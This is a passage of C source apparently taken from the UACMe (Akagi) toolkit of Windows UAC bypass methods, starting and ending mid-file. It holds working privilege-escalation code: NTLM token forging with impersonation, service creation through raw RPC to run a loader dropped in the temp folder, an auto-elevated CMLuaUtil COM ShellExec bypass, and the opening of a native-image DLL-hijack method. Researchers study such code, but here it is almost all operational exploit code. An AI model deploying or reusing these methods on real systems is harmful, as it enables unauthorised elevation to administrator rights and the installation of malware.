} RPC_BIND_REQUEST_HEADER, * PRPC_BIND_REQUEST_HEADER;
typedef struct _RPC_BIND_RESPONSE_CONTEXT_ENTRY {
WORD wResult;
WORD wAlign;
BYTE bTransferSyntax[16];
DWORD dwTransferSyntaxVersion;
} RPC_BIND_RESPONSE_CONTEXT_ENTRY, * PRPC_BIND_RESPONSE_CONTEXT_ENTRY;
typedef struct _RPC_BIND_RESPONSE_HEADER1 {
WORD wMaxSendFrag;
WORD wMaxRecvFrag;
DWORD dwAssocGroup;
} RPC_BIND_RESPONSE_HEADER1, * PRPC_BIND_RESPONSE_HEADER1;
typedef struct _RPC_BIND_RESPONSE_HEADER2 {
DWORD dwContextResultCount;
RPC_BIND_RESPONSE_CONTEXT_ENTRY Context;
} RPC_BIND_RESPONSE_HEADER2, * PRPC_BIND_RESPONSE_HEADER2;
typedef struct _RPC_CONNECTION {
HANDLE hFile;
DWORD dwCallIndex;
DWORD dwInputError;
DWORD dwRequestInitialized;
BYTE bProcedureInputData[MAX_PROCEDURE_DATA_LENGTH];
DWORD dwProcedureInputDataLength;
BYTE bProcedureOutputData[MAX_PROCEDURE_DATA_LENGTH];
DWORD dwProcedureOutputDataLength;
} RPC_CONNECTION, * PRPC_CONNECTION;
BOOL ucmxRpcBind(
_In_ PRPC_CONNECTION pRpcConnection,
_In_ RPC_WSTR pInterfaceUUID,
_In_ DWORD dwInterfaceVersion)
{
RPC_BASE_HEADER RpcBaseHeader;
RPC_BIND_REQUEST_HEADER RpcBindRequestHeader;
DWORD dwBytesWritten = 0;
DWORD dwBytesRead = 0;
BYTE bResponseData[MAX_RPC_PACKET_LENGTH];
RPC_BASE_HEADER* pRpcResponseBaseHeader = NULL;
RPC_BIND_RESPONSE_HEADER1* pRpcBindResponseHeader1 = NULL;
RPC_BIND_RESPONSE_HEADER2* pRpcBindResponseHeader2 = NULL;
BYTE* pSecondaryAddrHeaderBlock = NULL;
WORD wSecondaryAddrLen = 0;
DWORD dwSecondaryAddrAlign = 0;
//
// Set base header details.
//
RtlSecureZeroMemory(&RpcBaseHeader, sizeof(RpcBaseHeader));
RpcBaseHeader.wVersion = 5;
RpcBaseHeader.bPacketType = 11;
RpcBaseHeader.bPacketFlags = 3;
RpcBaseHeader.dwDataRepresentation = 0x10;
RpcBaseHeader.wFragLength = sizeof(RpcBaseHeader) + sizeof(RpcBindRequestHeader);
RpcBaseHeader.wAuthLength = 0;
RpcBaseHeader.dwCallIndex = pRpcConnection->dwCallIndex;
//
// Set bind request header details.
//
RtlSecureZeroMemory(&RpcBindRequestHeader, sizeof(RpcBindRequestHeader));
RpcBindRequestHeader.wMaxSendFrag = MAX_RPC_PACKET_LENGTH;
RpcBindRequestHeader.wMaxRecvFrag = MAX_RPC_PACKET_LENGTH;
RpcBindRequestHeader.dwAssocGroup = 0;
RpcBindRequestHeader.bContextCount = 1;
RpcBindRequestHeader.Context.wContextID = 0;
RpcBindRequestHeader.Context.wTransItemCount = 1;
RpcBindRequestHeader.Context.dwTransferSyntaxVersion = 2;
if (RPC_S_OK != UuidFromString(pInterfaceUUID, &RpcBindRequestHeader.Context.InterfaceUUID))
return FALSE;
RpcBindRequestHeader.Context.dwInterfaceVersion = dwInterfaceVersion;
if (RPC_S_OK != UuidFromString(RPC_NDR_UUID, &RpcBindRequestHeader.Context.TransferSyntaxUUID))
return FALSE;
//
// Write base header.
//
if (!WriteFile(pRpcConnection->hFile,
&RpcBaseHeader,
sizeof(RpcBaseHeader),
&dwBytesWritten,
NULL))
{
return FALSE;
}
//
// Write bind request header.
//
if (!WriteFile(pRpcConnection->hFile,
&RpcBindRequestHeader,
sizeof(RpcBindRequestHeader),
&dwBytesWritten,
NULL))
{
return FALSE;
}
pRpcConnection->dwCallIndex++;
//
// Get bind response.
//
RtlSecureZeroMemory(&bResponseData, sizeof(bResponseData));
if (!ReadFile(pRpcConnection->hFile,
bResponseData,
sizeof(bResponseData),
&dwBytesRead,
NULL))
{
return FALSE;
}
//
// Get a ptr to the base response header.
//
pRpcResponseBaseHeader = (PRPC_BASE_HEADER)bResponseData;
//
// Validate base response header.
//
if ((pRpcResponseBaseHeader->wVersion != 5) ||
(pRpcResponseBaseHeader->bPacketType != 12) ||
(pRpcResponseBaseHeader->bPacketFlags != 3) ||
(pRpcResponseBaseHeader->wFragLength != dwBytesRead))
{
return FALSE;
}
//
// Get a ptr to the main bind response header body.
//
pRpcBindResponseHeader1 = (PRPC_BIND_RESPONSE_HEADER1)RtlOffsetToPointer((BYTE*)pRpcResponseBaseHeader, sizeof(RPC_BASE_HEADER));
//
// Get secondary addr header ptr.
//
pSecondaryAddrHeaderBlock = (BYTE*)RtlOffsetToPointer((BYTE*)pRpcBindResponseHeader1, sizeof(RPC_BIND_RESPONSE_HEADER1));
wSecondaryAddrLen = *(WORD*)pSecondaryAddrHeaderBlock;
//
// Validate secondary addr length.
//
if (wSecondaryAddrLen > 256)
return FALSE;
//
// Calculate padding for secondary addr value if necessary.
//
dwSecondaryAddrAlign = CALC_ALIGN_PADDING((sizeof(WORD) + wSecondaryAddrLen), sizeof(ULONG));
//
// Get a ptr to the main bind response header body (after the variable-length secondary addr field).
//
pRpcBindResponseHeader2 = (PRPC_BIND_RESPONSE_HEADER2)RtlOffsetToPointer((BYTE*)pSecondaryAddrHeaderBlock,
sizeof(WORD) + wSecondaryAddrLen + dwSecondaryAddrAlign);
//
// Validate context count.
// Ensure the result value for context #1 was successful.
//
if ((pRpcBindResponseHeader2->dwContextResultCount != 1) ||
(pRpcBindResponseHeader2->Context.wResult != 0))
{
return FALSE;
}
return TRUE;
}
BOOL ucmxRpcConnect(
_In_ LPCWSTR lpPipeName,
_In_ RPC_WSTR pInterfaceUUID,
_In_ DWORD dwInterfaceVersion,
_In_ PRPC_CONNECTION pRpcConnection)
{
HANDLE hFile = NULL;
WCHAR szPipePath[MAX_PATH * 2];
RPC_CONNECTION RpcConnection;
//
// Set pipe path.
//
RtlSecureZeroMemory(szPipePath, sizeof(szPipePath));
_strcpy(szPipePath, TEXT("\\\\127.0.0.1\\pipe\\"));
_strcat(szPipePath, lpPipeName);
//
// Open rpc pipe.
//
hFile = CreateFile(szPipePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
return FALSE;
//
// Initialize rpc connection data.
//
RtlSecureZeroMemory(&RpcConnection, sizeof(RpcConnection));
RpcConnection.hFile = hFile;
RpcConnection.dwCallIndex = 1;
//
// Bind rpc connection.
//
if (!ucmxRpcBind(&RpcConnection, pInterfaceUUID, dwInterfaceVersion))
return FALSE;
//
// Store connection data.
//
RtlCopyMemory(pRpcConnection, &RpcConnection, sizeof(RpcConnection));
return TRUE;
}
VOID ucmxRpcInitializeRequestData(
_In_ PRPC_CONNECTION pRpcConnection)
{
//
// Initialize request data.
//
RtlSecureZeroMemory(pRpcConnection->bProcedureInputData, sizeof(pRpcConnection->bProcedureInputData));
pRpcConnection->dwProcedureInputDataLength = 0;
RtlSecureZeroMemory(pRpcConnection->bProcedureOutputData, sizeof(pRpcConnection->bProcedureOutputData));
pRpcConnection->dwProcedureOutputDataLength = 0;
//
// Reset input error flag.
//
pRpcConnection->dwInputError = 0;
pRpcConnection->dwRequestInitialized = 1;
}
BOOL ucmxRpcSendRequest(
_In_ PRPC_CONNECTION pRpcConnection,
_In_ DWORD dwProcedureNumber)
{
RPC_BASE_HEADER RpcBaseHeader;
RPC_REQUEST_HEADER RpcRequestHeader;
DWORD dwBytesWritten = 0;
BYTE bResponseData[MAX_RPC_PACKET_LENGTH];
RPC_BASE_HEADER* pRpcResponseBaseHeader = NULL;
RPC_RESPONSE_HEADER* pRpcResponseHeader = NULL;
DWORD dwProcedureResponseDataLength = 0;
DWORD dwBytesRead = 0;
BYTE* pTempProcedureResponseDataPtr = NULL;
//
// Ensure rpc request has been initialized.
//
if (pRpcConnection->dwRequestInitialized == 0)
return FALSE;
//
// Clear initialised flag.
//
pRpcConnection->dwRequestInitialized = 0;
//
// Check for input errors.
//
if (pRpcConnection->dwInputError != 0)
return FALSE;
//
// Set base header details.
//
RtlSecureZeroMemory(&RpcBaseHeader, sizeof(RpcBaseHeader));
RpcBaseHeader.wVersion = 5;
RpcBaseHeader.bPacketType = 0;
RpcBaseHeader.bPacketFlags = 3;
RpcBaseHeader.dwDataRepresentation = 0x10;
RpcBaseHeader.wFragLength = (WORD)(sizeof(RPC_BASE_HEADER) + sizeof(RPC_REQUEST_HEADER) + pRpcConnection->dwProcedureInputDataLength);
RpcBaseHeader.wAuthLength = 0;
RpcBaseHeader.dwCallIndex = pRpcConnection->dwCallIndex;
//
// Set request header details.
//
RtlSecureZeroMemory(&RpcRequestHeader, sizeof(RpcRequestHeader));
RpcRequestHeader.dwAllocHint = 0;
RpcRequestHeader.wContextID = 0;
RpcRequestHeader.wProcedureNumber = (WORD)dwProcedureNumber;
//
// Write base header.
//
if (!WriteFile(pRpcConnection->hFile,
&RpcBaseHeader,
sizeof(RpcBaseHeader),
&dwBytesWritten, NULL))
{
return FALSE;
}
//
// Write request header.
//
if (!WriteFile(pRpcConnection->hFile,
&RpcRequestHeader,
sizeof(RpcRequestHeader),
&dwBytesWritten,
NULL))
{
return FALSE;
}
//
// Write request body.
//
if (!WriteFile(pRpcConnection->hFile,
pRpcConnection->bProcedureInputData,
pRpcConnection->dwProcedureInputDataLength,
&dwBytesWritten,
NULL))
{
return FALSE;
}
//
// Increase call index.
//
pRpcConnection->dwCallIndex++;
//
// Get bind response.
//
RtlSecureZeroMemory(&bResponseData, sizeof(bResponseData));
if (!ReadFile(pRpcConnection->hFile,
bResponseData,
sizeof(bResponseData),
&dwBytesRead,
NULL))
{
return FALSE;
}
//
// Get a ptr to the base response header.
//
pRpcResponseBaseHeader = (PRPC_BASE_HEADER)bResponseData;
//
// Validate base response header.
//
if ((pRpcResponseBaseHeader->wVersion != 5) ||
(pRpcResponseBaseHeader->bPacketType != 2) ||
(pRpcResponseBaseHeader->bPacketFlags != 3) ||
(pRpcResponseBaseHeader->wFragLength != dwBytesRead))
{
return FALSE;
}
//
// Get a ptr to the main response header body.
//
pRpcResponseHeader = (RPC_RESPONSE_HEADER*)RtlOffsetToPointer((BYTE*)pRpcResponseBaseHeader, sizeof(RPC_BASE_HEADER));
//
// Context ID must be 0.
//
if (pRpcResponseHeader->wContextID != 0)
return FALSE;
//
// Calculate command response data length.
//
dwProcedureResponseDataLength = pRpcResponseBaseHeader->wFragLength - sizeof(RPC_BASE_HEADER) - sizeof(RPC_RESPONSE_HEADER);
//
// Store response data.
//
if (dwProcedureResponseDataLength > sizeof(pRpcConnection->bProcedureOutputData))
return FALSE;
pTempProcedureResponseDataPtr = (BYTE*)RtlOffsetToPointer((BYTE*)pRpcResponseHeader, sizeof(RPC_RESPONSE_HEADER));
RtlCopyMemory(pRpcConnection->bProcedureOutputData, pTempProcedureResponseDataPtr, dwProcedureResponseDataLength);
//
// Store response data length.
//
pRpcConnection->dwProcedureOutputDataLength = dwProcedureResponseDataLength;
return TRUE;
}
BOOL ucmxRpcAppendRequestData_Binary(
_In_ PRPC_CONNECTION RpcConnection,
_In_ BYTE* Data,
_In_ DWORD DataLength,
_In_ BOOL IsUnicode)
{
DWORD dwBytesAvailable = 0;
DWORD dwDataLength = DataLength;
DWORD dwPadding = 0;
if (IsUnicode)
dwDataLength *= sizeof(WCHAR);
//
// Ensure the request has been initialized.
//
if (RpcConnection->dwRequestInitialized == 0)
return FALSE;
dwPadding = CALC_ALIGN_PADDING(dwDataLength, sizeof(ULONG));
//
// Calculate number of bytes remaining in the input buffer.
//
dwBytesAvailable = sizeof(RpcConnection->bProcedureInputData) - RpcConnection->dwProcedureInputDataLength;
if ((dwDataLength + dwPadding) > dwBytesAvailable)
{
//
// Set input error flag.
//
RpcConnection->dwInputError = 1;
return FALSE;
}
//
// Store data in buffer.
//
RtlCopyMemory(&RpcConnection->bProcedureInputData[RpcConnection->dwProcedureInputDataLength], Data, dwDataLength);
RpcConnection->dwProcedureInputDataLength += dwDataLength;
RpcConnection->dwProcedureInputDataLength += dwPadding;
return TRUE;
}
BOOL ucmxRpcAppendRequestData_Dword(
_In_ PRPC_CONNECTION pRpcConnection,
_In_ DWORD dwValue)
{
return ucmxRpcAppendRequestData_Binary(
pRpcConnection,
(BYTE*)&dwValue,
sizeof(DWORD),
FALSE);
}
BOOL ucmxInvokeCreateSvcRpcMain(
_In_ LPWSTR lpszPayload)
{
BOOL bResult = FALSE;
RPC_CONNECTION RpcConnection;
BYTE bServiceManagerObject[20];
BYTE bServiceObject[20];
DWORD dwReturnValue = 0;
DWORD dwServiceNameLength = 0;
WCHAR szServiceName[32];
DWORD dwServiceCommandLineLength = 0;
RpcConnection.hFile = INVALID_HANDLE_VALUE;
do {
//
// Generate random name for service.
//
szServiceName[0] = 0;
supBinTextEncode(supGetTickCount64(), szServiceName);
dwServiceNameLength = (DWORD)(_strlen(szServiceName) + 1);
dwServiceCommandLineLength = (DWORD)(_strlen(lpszPayload) + 1);
if (!ucmxRpcConnect(TEXT("ntsvcs"), SVCCTL_UUID, 2, &RpcConnection))
break;
//
// OpenSCManager.
//
ucmxRpcInitializeRequestData(&RpcConnection);
ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
ucmxRpcAppendRequestData_Dword(&RpcConnection, SC_MANAGER_ALL_ACCESS);
if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_OPEN_SC_MANAGERW))
break;
if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_OPEN_SC_MANAGER)
break;
dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[20];
if (dwReturnValue != 0)
break;
RtlCopyMemory(bServiceManagerObject, &RpcConnection.bProcedureOutputData[0], sizeof(bServiceManagerObject));
//
// CreateService RPC request.
//
ucmxRpcInitializeRequestData(&RpcConnection);
ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceManagerObject, sizeof(bServiceManagerObject), FALSE);
ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceNameLength);
ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceNameLength);
ucmxRpcAppendRequestData_Binary(&RpcConnection, (BYTE*)szServiceName, dwServiceNameLength, TRUE);
ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_ALL_ACCESS);
ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_WIN32_OWN_PROCESS);
ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_DEMAND_START);
ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_ERROR_IGNORE);
ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceCommandLineLength);
ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceCommandLineLength);
ucmxRpcAppendRequestData_Binary(&RpcConnection, (BYTE*)lpszPayload, dwServiceCommandLineLength, TRUE);
ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_CREATE_SERVICEW))
break;
if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_CREATE_SERVICE)
break;
dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[24];
if (dwReturnValue != 0)
break;
RtlCopyMemory(bServiceObject, &RpcConnection.bProcedureOutputData[4], sizeof(bServiceObject));
//
// StartService RPC request.
//
ucmxRpcInitializeRequestData(&RpcConnection);
ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceObject, sizeof(bServiceObject), FALSE);
ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_START_SERVICEW))
break;
if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_START_SERVICE)
break;
dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[0];
if (dwReturnValue != 0 && dwReturnValue != ERROR_SERVICE_REQUEST_TIMEOUT)
break;
//
// DeleteService RPC request.
//
ucmxRpcInitializeRequestData(&RpcConnection);
ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceObject, sizeof(bServiceObject), FALSE);
if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_DELETE_SERVICE))
break;
if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_DELETE_SERVICE)
break;
dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[0];
if (dwReturnValue != 0)
break;
bResult = TRUE;
} while (FALSE);
if (RpcConnection.hFile != INVALID_HANDLE_VALUE)
CloseHandle(RpcConnection.hFile);
return bResult;
}
SECURITY_STATUS ucmxForgeNetworkAuthToken(
_Out_ PHANDLE TokenHandle
) {
CredHandle hCredClient, hCredServer;
TimeStamp lifetimeClient, lifetimeServer;
SecBufferDesc negotiateDesc, challengeDesc, authenticateDesc;
SecBuffer negotiateBuffer, challengeBuffer, authenticateBuffer;
CtxtHandle clientContextHandle, serverContextHandle;
ULONG clientContextAttributes, serverContextAttributes;
SECURITY_STATUS secStatus;
HANDLE hTokenNetwork = NULL;
*TokenHandle = NULL;
serverContextHandle.dwLower = 0;
serverContextHandle.dwUpper = 0;
clientContextHandle.dwLower = 0;
clientContextHandle.dwUpper = 0;
hCredServer.dwLower = 0;
hCredServer.dwUpper = 0;
RtlSecureZeroMemory(&negotiateBuffer, sizeof(negotiateBuffer));
RtlSecureZeroMemory(&challengeBuffer, sizeof(challengeBuffer));
RtlSecureZeroMemory(&authenticateBuffer, sizeof(authenticateBuffer));
do {
secStatus = AcquireCredentialsHandle(NULL,
(LPWSTR)NTLMSP_NAME,
SECPKG_CRED_OUTBOUND,
NULL,
NULL,
NULL,
NULL,
&hCredClient,
&lifetimeClient);
if (!NT_SUCCESS(secStatus))
break;
secStatus = AcquireCredentialsHandle(NULL,
(LPWSTR)NTLMSP_NAME,
SECPKG_CRED_INBOUND,
NULL,
NULL,
NULL,
NULL,
&hCredServer,
&lifetimeServer);
if (!NT_SUCCESS(secStatus))
break;
negotiateDesc.ulVersion = 0;
negotiateDesc.cBuffers = 1;
negotiateDesc.pBuffers = &negotiateBuffer;
negotiateBuffer.cbBuffer = MAX_MESSAGE_SIZE;
negotiateBuffer.BufferType = SECBUFFER_TOKEN;
negotiateBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);
if (negotiateBuffer.pvBuffer == NULL) {
secStatus = SEC_E_INSUFFICIENT_MEMORY;
break;
}
secStatus = InitializeSecurityContext(&hCredClient,
NULL,
NULL,
ISC_REQ_DATAGRAM,
0,
SECURITY_NATIVE_DREP,
NULL,
0,
&clientContextHandle,
&negotiateDesc,
&clientContextAttributes,
&lifetimeClient);
if (!NT_SUCCESS(secStatus))
break;
challengeDesc.ulVersion = 0;
challengeDesc.cBuffers = 1;
challengeDesc.pBuffers = &challengeBuffer;
challengeBuffer.cbBuffer = MAX_MESSAGE_SIZE;
challengeBuffer.BufferType = SECBUFFER_TOKEN;
challengeBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);
if (challengeBuffer.pvBuffer == NULL) {
secStatus = SEC_E_INSUFFICIENT_MEMORY;
break;
}
secStatus = AcceptSecurityContext(&hCredServer,
NULL,
&negotiateDesc,
ASC_REQ_DATAGRAM,
SECURITY_NATIVE_DREP,
&serverContextHandle,
&challengeDesc,
&serverContextAttributes,
&lifetimeServer);
if (!NT_SUCCESS(secStatus))
break;
authenticateDesc.ulVersion = 0;
authenticateDesc.cBuffers = 1;
authenticateDesc.pBuffers = &authenticateBuffer;
authenticateBuffer.cbBuffer = MAX_MESSAGE_SIZE;
authenticateBuffer.BufferType = SECBUFFER_TOKEN;
authenticateBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);
if (authenticateBuffer.pvBuffer == NULL) {
secStatus = SEC_E_INSUFFICIENT_MEMORY;
break;
}
secStatus = InitializeSecurityContext(NULL,
&clientContextHandle,
NULL,
0,
0,
SECURITY_NATIVE_DREP,
&challengeDesc,
0,
&clientContextHandle,
&authenticateDesc,
&clientContextAttributes,
&lifetimeClient);
if (!NT_SUCCESS(secStatus))
break;
secStatus = AcceptSecurityContext(NULL,
&serverContextHandle,
&authenticateDesc,
0,
SECURITY_NATIVE_DREP,
&serverContextHandle,
NULL,
&serverContextAttributes,
&lifetimeServer);
if (!NT_SUCCESS(secStatus))
break;
secStatus = QuerySecurityContextToken(&serverContextHandle, &hTokenNetwork);
} while (FALSE);
if (negotiateBuffer.pvBuffer)
supHeapFree(negotiateBuffer.pvBuffer);
if (challengeBuffer.pvBuffer)
supHeapFree(challengeBuffer.pvBuffer);
if (authenticateBuffer.pvBuffer)
supHeapFree(authenticateBuffer.pvBuffer);
FreeCredentialsHandle(&hCredClient);
FreeCredentialsHandle(&hCredServer);
DeleteSecurityContext(&clientContextHandle);
DeleteSecurityContext(&serverContextHandle);
*TokenHandle = hTokenNetwork;
return secStatus;
}
/*
* ucmSspiDatagramMethod
*
* Purpose:
*
* Bypass UAC using SSPI datagram context.
*
* Fixed by MS ninja patch (including old Win10 releases).
*
*/
NTSTATUS ucmSspiDatagramMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
BOOL bNeedCleanup = FALSE, bImpersonate = FALSE;
SECURITY_IMPERSONATION_LEVEL impLevel;
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HANDLE hToken = NULL;
WCHAR szLoaderFileName[MAX_PATH * 2];
//
// Forge token for impersonation.
//
MethodResult = ucmxForgeNetworkAuthToken(&hToken);
if (!NT_SUCCESS(MethodResult))
return MethodResult;
do {
MethodResult = STATUS_ACCESS_DENIED;
//
// Write loader to the %temp%
//
if (!supReplaceDllEntryPoint(
ProxyDll,
ProxyDllSize,
AKATSUKI_ENTRYPOINT_EXE,
TRUE))
{
break;
}
RtlSecureZeroMemory(&szLoaderFileName, sizeof(szLoaderFileName));
_strcpy(szLoaderFileName, g_ctx->szTempDirectory);
_strcat(szLoaderFileName, THEOLDNEWTHING);
_strcat(szLoaderFileName, TEXT(".exe"));
bNeedCleanup = supWriteBufferToFile(szLoaderFileName, ProxyDll, ProxyDllSize);
if (!bNeedCleanup)
break;
bImpersonate = ImpersonateLoggedOnUser(hToken);
if (!bImpersonate)
break;
if (!supGetThreadTokenImpersonationLevel(NtCurrentThread(), &impLevel))
break;
if (impLevel < SecurityImpersonation)
break;
if (ucmxInvokeCreateSvcRpcMain(szLoaderFileName))
MethodResult = STATUS_SUCCESS;
} while (FALSE);
if (bImpersonate)
RevertToSelf();
if (hToken)
CloseHandle(hToken);
if (bNeedCleanup)
DeleteFile(szLoaderFileName);
return MethodResult;
}
================================================
FILE: Source/Akagi/methods/api0cradle.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2022
*
* TITLE: API0CRADLE.C
*
* VERSION: 3.61
*
* DATE: 22 Jun 2022
*
* UAC bypass method from Oddvar Moe aka api0cradle.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* ucmCMLuaUtilShellExecMethod
*
* Purpose:
*
* Bypass UAC using AutoElevated undocumented CMLuaUtil interface.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
NTSTATUS ucmCMLuaUtilShellExecMethod(
_In_ LPWSTR lpszExecutable
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HRESULT r, hr_init;
ICMLuaUtil* CMLuaUtil = NULL;
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
r = ucmAllocateElevatedObject(
T_CLSID_CMSTPLUA,
&IID_ICMLuaUtil,
CLSCTX_LOCAL_SERVER,
(void**)&CMLuaUtil);
if (r != S_OK)
break;
if (CMLuaUtil == NULL)
break;
r = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil,
lpszExecutable,
NULL,
NULL,
SEE_MASK_DEFAULT,
SW_SHOW);
if (SUCCEEDED(r))
MethodResult = STATUS_SUCCESS;
} while (FALSE);
if (CMLuaUtil != NULL) {
CMLuaUtil->lpVtbl->Release(CMLuaUtil);
}
if (hr_init == S_OK)
CoUninitialize();
return MethodResult;
}
================================================
FILE: Source/Akagi/methods/azagarampur.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2020 - 2025
*
* TITLE: AZAGARAMPUR.C
*
* VERSION: 3.69
*
* DATE: 07 Jul 2025
*
* UAC bypass methods from AzAgarampur.
*
* For description please visit original URL
*
* https://github.com/AzAgarampur/byeintegrity-uac
* https://github.com/AzAgarampur/byeintegrity2-uac
* https://github.com/AzAgarampur/byeintegrity3-uac
* https://github.com/AzAgarampur/byeintegrity4-uac
* https://github.com/AzAgarampur/byeintegrity-lite
* https://github.com/AzAgarampur/byeintegrity7-uac
* https://github.com/AzAgarampur/byeintegrity8-uac
* https://github.com/AzAgarampur/byeintegrity9-uac
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#ifdef _WIN64
#include "pcasvc/w7/x64/pcasvc7_64.h"
#include "pcasvc/w8_10/x64/pcasvc64.h"
#else
#include "pcasvc/w7/x86-32/pcasvc7_32.h"
#include "pcasvc/w8_10/x86-32/pcasvc32.h"
#endif
/*
* ucmxNgenLogLastWrite
*
* Purpose:
*
* Query ngen.log last write time.
*
*/
BOOL ucmxNgenLogLastWrite(
_Out_ FILETIME* LastWriteTime
)
{
BOOL bResult = FALSE;
HANDLE hFile;
WCHAR szFileName[MAX_PATH * 2];
LastWriteTime->dwLowDateTime = 0;
LastWriteTime->dwHighDateTime = 0;
_strcpy(szFileName, g_ctx->szSystemRoot);
_strcat(szFileName, MSNETFRAMEWORK_DIR);
#ifdef _WIN64
_strcat(szFileName, TEXT("64"));
#endif
_strcat(szFileName, TEXT("\\"));
_strcat(szFileName, NET4_DIR);
_strcat(szFileName, TEXT("\\"));
_strcat(szFileName, TEXT("ngen.log"));
hFile = CreateFile(szFileName,
GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL,
OPEN_EXISTING,
0,
NULL);
if (hFile != INVALID_HANDLE_VALUE) {
bResult = GetFileTime(hFile, NULL, NULL, LastWriteTime);
CloseHandle(hFile);
}
return bResult;
}
/*
* ucmNICPoisonMethod
*
* Purpose:
*
* Bypass UAC by by Dll hijack of Native Image Cache.
*
*/
NTSTATUS ucmNICPoisonMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
WCHAR szFileName[MAX_PATH * 2];
WCHAR szTargetProc[MAX_PATH * 2];
DWORD origSize = 0, bytesIO;
PBYTE origFileBuffer = NULL;
HANDLE hFile;
LPWSTR oldSecurity = NULL;
LPWSTR lpAssemblyFilePath = NULL, lpTargetFileName = NULL;
BOOLEAN IsWin7, bSecurityReset = FALSE;
FILETIME lastWriteTime, checkTime;
INT iRetryCount = 50;
GUID targetMVID;
FUSION_SCAN_PARAM scanParam;
do {
IsWin7 = (g_ctx->dwBuildNumber < NT_WIN8_RTM);
if (!fusUtilInitFusion(IsWin7 ? 2 : 4))
break;
if (!fusUtilGetAssemblyPathByName(ASSEMBLY_ACCESSIBILITY, &lpAssemblyFilePath))
break;
if (!fusUtilGetImageMVID(lpAssemblyFilePath, &targetMVID))
break;
if (!IsWin7) {
ucmxNgenLogLastWrite(&lastWriteTime);
//
// Run NET maintenance tasks.
//
_strcpy(szFileName, g_ctx->szSystemDirectory);
_strcat(szFileName, MSCHEDEXE_EXE);
if (!supRunProcess2(szFileName,
TEXT("Start"),
NULL,
SW_HIDE,
SUPRUNPROCESS_TIMEOUT_DEFAULT))
{
break;
}
//
// Wait for task completion.
//
do {
Sleep(2000);
if (FALSE == supIsProcessRunning(TEXT("ngentask.exe"))) {
if (ucmxNgenLogLastWrite(&checkTime)) {
if (CompareFileTime(&lastWriteTime, &checkTime) < 0) {
break;
}
}
}
--iRetryCount;
} while (iRetryCount);
}
//
// Locate target NI file.
//
scanParam.ReferenceMVID = &targetMVID;
scanParam.lpFileName = NULL;
_strcpy(szFileName, g_ctx->szSystemRoot);
_strcat(szFileName, TEXT("assembly\\NativeImages_"));
if (IsWin7)
_strcat(szFileName, NET2_DIR);
else
_strcat(szFileName, NET4_DIR);
#ifdef _WIN64
_strcat(szFileName, TEXT("_64"));
#else
_strcat(szFileName, TEXT("_32"));
#endif
_strcat(szFileName, TEXT("\\Accessibility\\"));
